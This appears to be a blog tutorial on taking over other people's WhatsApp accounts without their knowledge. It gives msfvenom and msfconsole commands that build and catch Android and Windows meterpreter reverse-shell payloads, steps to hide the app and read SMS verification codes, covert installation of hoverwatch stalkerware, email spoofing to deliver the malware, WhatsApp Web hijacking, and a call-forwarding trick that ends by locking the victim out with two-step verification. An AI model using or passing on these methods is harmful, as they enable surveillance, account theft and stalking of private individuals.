Hacking Whatsapp is not an easy task. You will found many fake apps and websites that claim WhatsApp can be hacked within minutes.
But Believe me, this is not possible. I mean do you really think this is possible? If possible, then there will be no personal life of anyone who is using whatsapp.
Whatsapp have bug bounty program. It means if you find any bug in WhatsApp then the company will pay you money depending on how dangerous is a bug.
But don’t worry you can hack WhatsApp but not there is no magic there is loginc behind this.
If you have any problem let me know by comments. But I will not hack a WhatsApp account for you
Whatsapp Hacking technique that I post will work on android only but some of them you work on iPhone or WhatsApp web
- By Hacking android phone.
- Using WhatsApp web
- getting WhatsApp code
- keylogger app
- sending a malicious photo
- SS7 ( you need a physical hub and a lot of networking knowledge)
- Whatsapp database ( using this you can see deleted message 🙂 but you need physical access to device 🙁 )
- By this Unknown trick
By Hacking android phone
It is not a difficult method you can do it. If you read this trick, carefully you can hack android without touching your victim phone :). Keep patience.
I think Metasploit is the best way to Hack android phone.
In computer or laptop, I will advise you to install Kali Linux or parrot sec. Metasploit is pre-installed on both operating systems.
Metasploit can installed on android phone using termux. Read here to know how to install termux on your android phone. After installing this, you have to install the Metasploit framework.
Termux or Kali Linux?
Guys, please accept it mobile phones can’t become a computer. No doubt termux framework which is Awesome can be used for hacking, but I don’t know what the problem with me I was unable to install it while keep trying again and again. You can try it If you do not have any Pc.
I check youtube videos they install malicious apps on their own phone where termux is already installed. LOL, I don’t want to make you fool, but you can try termux if you wish to.
I will use parrot sec for this you can use anyone like Kali Linux etc. Metasploit can also be installed on the window operating system
creating the payload
msfvenom -p android/meterpreter/reverse_tcp LPORT=your local IP LPORT=4444 -o appname.apk
First I will do on my local network than on show you how to perform over the internet.
Here LHOST is my IP local IP address you can find using ifconfig command.
It will generate payload in /root directory (if you log in as root) with the name of appname.apk, install this app on your phone.
You need to listen a connection here are commands for this.
msfconsole -x “use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST 192.168.43.60; run”
Here lhost is my local Ip address no need to set lport because it is already 4444.
Make sure android device and the computer should be connected to the same network. I just turned on hotspot on from my phone then connect my pc.
Install the app on your phone open it will show you nothing but on the computer, you will get the meterpreter session. I have searched a lot, but you can see messages, contacts, files only.
- You can see message using dump_sms so it means you can get the WhatsApp verification code. using dump_contacts
- you can get all contact list message to anyone.
- Using files, you can copy Whatsapp media files.
Meterpreter session is like this.Type help to see what you can do on the target phone.
I have highlighted dump_sms which is used to get all SMS messages. TO browse files, you should know necessary Linux commands. Before hacking real device make sure you practice enough.
In your mobile phone Install parallel space( size: 1.72 MB) application from play store using this app and you can also use the dual account of any other app like hike, we chat, facebook, etc.
Here is process how to use parallel space open it and click on clone button after that select WhatsApp choose to Add to parallel space now it will make an icon of WhatsApp where you can use dual WhatsApp
Click on WhatsApp icon I think you know what to do next type victim it will send code then you can get the code using the dump_sms command.
Above command will copy a txt file in /root (user if you log in as root). Open new terminal and type ls
nano is text editor like notepad. It will open the file.
You see my Google verification code. Same way you can see WhatsApp verification code. I told you above you can get the contact list and WhatsApp media files learn Linux commands and do it yourself.
Bonus Tip: Meterpreter session will die after some time Here is the solution to this problem
How to perform over the internet
To use it over the internet, you need to port forward your router. If you are using mobile data then you can’t port forward you need Internet by broadband. Here is a video on how to port forward your router.
I don’t have a broadband connection right now But believe me it works.
Bonus Tip: Always get WhatsApp verification code at midnight because people are sleeping at that Time. Make sure you hide app icon using the hide-app-icon command.
You will you install this app on victim phone or without touching his phone?
Recently I have published article android hacking part 2: Install apps remotely. I have 2-3 ways to install apps without access phone like email spoofing which did not work on android mobile. But beef works on all devices.
if your victim is using web email like (firstname.lastname@example.org), then Use email spoofing. It is a technique to send emails from anyone address here is the screenshot.
This my webmail I send this email using https://emkei.cz/ As you can I received an email from email@example.com (believe he is not my friend)
But the biggest limitation of the email spoofing it does not work for Gmail service.
Using Whatsapp web
There is nothing to explain in this technique. You just need physical access to your victim phone. Open WhatsApp on his phone click on the menu at the top of the Right corner.
Tap on Whatsapp Web button. If you open it the first time, you will see a camera with tip open web.whatsapp.com. Sometime victim login to Whatsapp using his computer then there will be a logged in the device list.
I recommend the chrome browser. Open a new tab and click on menu and tap on Desktop site. If you did not tick, you will not be able to see QR code.
Open web.whatsapp.com on your phone make sure tick Keep me signed in. It is important.
Scan QR code using your victim mobile number. After scanning code his/her account will be signed.
When you scan code successfully you will see something like this.
Next time you visit web.whatsapp.com, you will see logged in account.
The main limitation of this technique is that it will work until your victim has the working internet connection. If he/she turned the internet of, you would not be able to see his/her messages.
I will advise ask your, mutual friend, to call your victim on WhatsApp so you can read messages without any problem.
I hope it will help you.
Getting Whatsapp verification code
Another easy process but robust to get the code. I know you know how to do it. The main problem with this method is WhatsApp will not run on two devices simultaneously on two or more device. It is outdated technique What I think you should know about it.
Best thing of this is that sometimes people will lock there Whatsapp and phone with a pattern or anything else. In that case, you can use this trick because you can read Whatsapp message without the opening lock screen. Here is the screenshot of this.
The hacking android phone is the same thing But using this you can’t media files and contacts.
Using keylogger app
I think this is the best way to hack Whatsapp. The keylogger app is an app which record every keyword typed by the user. So not only WhatsApp you get enough if you have successfully installed the keylogger app.
There are many keyloggers apps available, but I think hoverwatch is the best because
It gives you a free trial for three days (without the credit card ).
Here are steps
This app is not available in Google play store. You have to download from official site. This is best free spy software from all tested apps. First of all, it is not a keyboard app it is a spy app. You will not need any physical access to see typed keystrokes again and again.
Just Install and receive log files online. There is the only one limitation in this app that it will give you free trial version up to 3 days. Therefore, you can use hoverwatch free for only three days. Paid Plans are starting from $8.33/month for a single device
How to enable hoverwatch
- Open hoverwatch official site, type your email and password and click on “Sign up Free” Button.
- It will take you to https://i.hoverwatch.com/app/index.html#add-device URL you can see a Download button click on it [make sure it is under android tab as shown in the screenshot]
- After downloading Install it in which phone you want to install. Don’t ask in comments how to install an app.
- After Installing it, open the app. When you open this app, it will ask you about I am going to use this software to monitor. I recommend you to choosing my own deviceand make sure Hide Hoverwatch Icon and click on the Ok button
- on next page agree With Legal Terms tap on I ACCEPT button then It will ask for “Activate device administrator” click on Activate button
- On next page, it will ask your email & password so enter email and password that you made in the first step
- Done now you are ready you can view logs on the hoverwatch website. Sign in your account, and you can see all recorded keystroke.
By Sending a malicious virus on WhatsApp
Did you think this is something that I discovered but believe me I just try first and it works :D. Before sending any malicious photo early, I will tell you how to send a malicious virus app.
I’m going to use Metasploit, but antivirus will catch it is malware. (don’t worry I have a solution to this problem ) but just for the demo, I will send Metasploit payload by disabling antivirus.
How to create payload using Metasploit
msfvenom -p windows/meterpreter/reverse_tcp/ LHOST=your local IP address -f exe -o /root/thename.exe.
ifconfig command will show your IP address. if you want to understand your code then visit Metasploit training for beginners
Before sending this run this command to listen to the connection.
msfconsole -x ” use exploit/multi/handler/ set payload windows/meterpreter/reverse_tcp set LHOST your local Ip address. “
To send this file open web.whatsapp.com on your computer.
I will send this payload to Sandeep It does not matter click on attack icon and select photos and gallery.
It will open a file manager dialog box. At the bottom change your file type to all.
Select your virus file and click on open. The data will start uploading.
When our target download this using WhatsApp click to open it, he/she will get nothing
but you will get the meterpreter session. using keyscan_start, stop dump you can make your payload work like a keylogger (but you send it using Whatsapp)
Of course, the antivirus will detect it try to remove. The perfect solution of this is code your virus. It is not too complicated. You just need some programming experience.
You have watched a lot of videos hack WhatsApp using ss7. You have also search how to hack WhatsApp using ss7. If you don’t know what ss7 is, then watch this video.
I hope you will understand what ss7(system signal 7) is. Believe you can’t do. For this, you need networking knowledge and a physical hub. But I thought you should know about it. If you want to understand it deeply then watch this video (it is in the Hindi language).
Extracting Whatsapp database
Whatsapp stores all message in a database it will be on your phone. But this WhatsApp database is locked with a key. To get key, you have to root your phone. Using key, you can unlock database then read all messages.
The best thing about this no matter if you target delete WhatsApp message. They are present in the database.
How to root your phone.
It depends on your model number etc. search on google how to root model name.
WhatsApp database location
Don’t try to access without root.
Watch this video to know to decrypt data.
By This unknown trick
This is a very interesting way to hack WhatsApp. Just dial this number from victim phone, and then you can hack WhatsApp account
Ok from your victim mobile number dial this number *21*yourmobilenumber#.
It will forward calls to your mobile number.
Ok for further steps make sure your victim is not using his/her phone.
Tip: Do it when your victim is not sleeping I mean at midnight.
Open WhatsApp in your phone enter victim mobile number
Wait for 30 seconds and then click on call me
You will get called on your mobile number because you forward call in the first step.
Listen to WhatsApp code carefully enter the code.
You hacked WhatsApp successfully. But we can do more.
Apply step 2 verification so when the victim did not get his WhatsApp account easily.
To stop call forwarding dial #21#
I hope you have learned something new from this article. I will continually add new technique if I find something new.